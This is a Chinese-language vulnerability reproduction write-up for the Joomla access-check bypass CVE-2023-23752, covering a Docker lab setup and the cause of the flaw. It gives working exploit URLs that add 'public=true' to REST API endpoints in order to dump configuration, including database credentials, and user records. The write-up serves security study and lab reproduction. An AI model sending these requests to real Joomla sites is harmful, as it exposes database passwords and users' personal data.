问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Joomla权限绕过漏洞(CVE-2023-23752)
# Joomla权限绕过漏洞(CVE-2023-23752) Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。 在其4.0.0版本到4.2.7版本中,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕...
Joomla权限绕过漏洞(CVE-2023-23752) ============================ Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。 在其4.0.0版本到4.2.7版本中,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕过权限检查,访问任意Rest API。 参考链接: - <https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html> - <https://xz.aliyun.com/t/12175> - <https://vulncheck.com/blog/joomla-for-rce> 漏洞环境 ---- 执行如下命令启动一个Joomla 4.2.7: ```php docker compose up -d ``` 服务启动后,访问`http://your-ip:8080`即可查看到Joomla页面。 漏洞复现 ---- 这个漏洞是由于错误的属性覆盖导致的,攻击者可以通过在访问Rest API时传入参数`public=true`来绕过权限校验。 比如,访问下面这个链接即可读取所有配置项,包括数据库连接用户名和密码: ```php http://your-ip:8080/api/index.php/v1/config/application?public=true ``` ![](https://shs3.b.qianxin.com/butian_public/f64740631b743b3557ccdae7ace0077f5857df63f1cca.jpg) 如果不添加`public=true`,则访问会被拒绝: ![](https://shs3.b.qianxin.com/butian_public/f15495457c2899b666171623e8f7645f1a462aae07c3a.jpg) 访问下面这个链接即可读取所有用户信息,包含邮箱等: ```php http://your-ip:8080/api/index.php/v1/users?public=true ``` ![](https://shs3.b.qianxin.com/butian_public/f529197521bb2cfc1d88ac1c2894b58a494f016f4052f.jpg)
发表于 2024-07-12 18:46:17
阅读 ( 874 )
分类:
Web应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!